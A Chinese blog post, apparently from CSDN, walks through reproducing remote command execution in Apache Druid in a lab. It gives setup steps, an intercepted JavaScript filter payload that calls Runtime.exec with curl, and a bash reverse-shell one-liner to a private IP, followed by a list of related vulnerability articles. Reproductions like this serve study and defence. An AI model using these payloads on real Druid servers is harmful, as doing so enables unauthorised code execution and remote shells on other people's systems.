Apache Druid远程命令执行

最新推荐文章于 2024-05-03 11:46:25 发布
最新推荐文章于 2024-05-03 11:46:25 发布
阅读量470 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nuanliunian/article/details/113686898
版权

Apache Druid远程命令执行

环境搭建

参考现有的低版本druid
docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

启动来访问不了。。。只能官网下载安装

druid下载地址
安装完成后访问IP:8888
在这里插入图片描述

导入文件

在这里插入图片描述

填写目录

填入
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
在这里插入图片描述
填好内容
在这里插入图片描述
抓包,修改filter的内容

{
    "type":"javascript",
    "function":"function(value){return java.lang.Runtime.getRuntime().exec('curl ip:8000')}",
    "dimension":"added",
    "":{
    "enabled":"true"
    }
}

在这里插入图片描述
将命令修改为反弹shell

/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.37.132/8000 0>&1

在这里插入图片描述

浮生一世暖流年
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Druid 远程命令执行
m0_46689007的博客
11-29 393
Apache Druid 远程命令执行(附流量分析)
messagepackKafkaSerde:Kafka序列化器反序列化器,可与MessagePack格式的消息一起使用,并将其反序列化为JSON,然后序列化为Byte数组,该数组打算在Apache Druid数据库中使用
03-17
**MessagePackKafkaSerde** 是一个专门为Apache Kafka设计的序列化和反序列化工具,它支持MessagePack格式的消息,并能将其转换为JSON以及Byte数组,以适应在Apache Druid数据库中的使用。MessagePack是一种轻量级的...
Apache druid 远程命令执行 (CVE-2021-25646)
YouthBelief的博客
11-04 319
druid 远程命令执行 (CVE-2021-25646)druid 远程命令执行 (CVE-2021-25646)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 druid 远程命令执行 (CVE-2021-25646) Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 0x01 漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任
Apache SSI远程命令执行漏洞
最新发布
weixin_74020633的博客
05-03 1019
Apache SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。从技术层面来讲,SSI是一种在静态的shtml文件中根据需求插入内容;SSI其实是一套为web服务器提供的命令,指令的基本格式为:<!--指令名称="指令内容"-->指令名称指令作用#include将文本文件的内容直接插入到文档页面中#echo将环境变量插入到页面中。
druid 远程命令执行(CVE-2021-25646)
qq_53086690的博客
11-23 1610
druid 远程命令执行 druid 介绍 Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端 影响版本 Apache Druid < 0.20.1 漏洞简介 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,
druid 远程命令执行 (CVE-2021-25646)
小小猪的博客
12-28 1019
druid 远程命令执行 (CVE-2021-25646) 漏洞介绍: Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码 影响版本: Apache Druid
[Vulfocus解题系列] druid 远程命令执行 (CVE-2021-25646)
00勇士王子的博客
07-16 1276
漏洞介绍 名称: druid 远程命令执行 (CVE-2021-25646) 描述: Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 影响版本 Apache Dru
2023攻防演练必修高危漏洞集合.pdf
07-23
nginxWebUI 存在远程命令执行漏洞,攻击者可以通过构造恶意请求执行系统命令,可能会导致服务器被控制和敏感数据泄露。 四、Openfire 身份认证绕过漏洞 (CVE-2023-32315) Openfire 存在身份认证绕过漏洞,攻击者...
2023攻防演练必修高危漏洞集合
08-06
前台远程命令执行漏洞、Nacos 反序列化漏洞、GitLab 路径遍历漏洞、Apache RocketMQ 命令注入漏洞、海康威视 iVMS-8700 综合安防管理平台软件文件上传漏洞、泛微 e-cology9 用户登录漏洞、Foxit PDF Reader/Editor ...
Goby 最全最新POC共计448个
08-30
CNVD-2021-00876、Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109、XXL-JOB 任务调度中心 后台默认弱口令、帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757、锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞、蜂网...
java开源包1
06-28
SpeechLion 是一个语音识别程序,主要用来处理桌面命令,基于 Sphinx-4 语音识别引擎开发。用户可以通过该软件来控制 Linux 桌面,例如打开google搜索、鼠标点击、下一窗口、打开帮助、静音等操作。 Java发送短信包...
【漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646
Adminxe的博客
02-03 446
0x00 前言 这个漏洞的根本问题是一个druid中全局性的问题,开发者在使用Jackson相关的标签时,出现疏漏,使得攻击者可以构造传入的json串来控制一些敏感的参数。 阿里云安全@Litch1向Apache官方报告了Apache Druid远程代码执行漏洞 当时 漏洞 已知,处于某些原因,提取的poc也没进行公布,今天醒来,看到很多公众号发 ,也就总结一下,集各家所长,写一个复现的文章。 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据...
Apache Druid 远程代码执行漏洞
per_se_veran_ce的博客
02-09 859
环境搭建 #拉取镜像 docker pull fokkodriesprong/docker-druid #启动镜像 docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid 访问8888端口 环境搭建成功。 漏洞复现 抓包,替换数据包POC POST /druid/indexer/v1/sampler?for=filter HTTP/1.1 Host: 192.168.5.138:8888 User-Agent: Mozilla
Apache Druid远程命令执行漏洞复现(CVE-2021-25646)
MD@@nr丫卡uer
02-05 522
漏洞概述 Apache Druid 是一个分布式的数据处理系统。Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 影响版本 Apache Druid < 0.20.1 漏洞复现 访问8888端口,进入Apache Druid首页: 点击左上方Load data,在点击Local disk,再点击右
Apache Druid命令执行漏洞复现
weixin_53696027的博客
06-02 531
CVE-2019-25646是由由阿里云安全发现的 Apache Druid 远程代码执行漏洞
Druid-imply常用服务的命令
Alongpo的博客
01-31 1560
我的imply的安装的路径是在 /usr/local/bigdata/imply-2.8.6 一.日志的路径 rm -rf /usr/local/bigdata/imply-2.8.6/var more /usr/local/bigdata/imply-2.8.6/var/sv/coordinator/current more /usr/local/bigdata/imply-2.8.6/var/...
中间件漏洞 | Apache-SSI/任意命令执行
weixin_52116519的博客
11-05 570
Apache SSI 远程命令执行漏洞在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用
druid的简单使用
sincelegend的博客
08-31 254
命令窗口中使用 java -cp druid-1.1.14.jar com.alibaba.druid.filter.config.ConfigTools yourpassword 就可以生成加密后的密码
如何查看linux的Apache Druid版本
09-04
执行命令后,终端将显示Apache Druid的版本号。 4. 如果上述命令未返回版本号,您可以尝试通过在终端中执行以下命令来查找Druid的安装路径: ``` which druid ``` 此命令将返回Druid的安装路径,例如:/usr/local/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值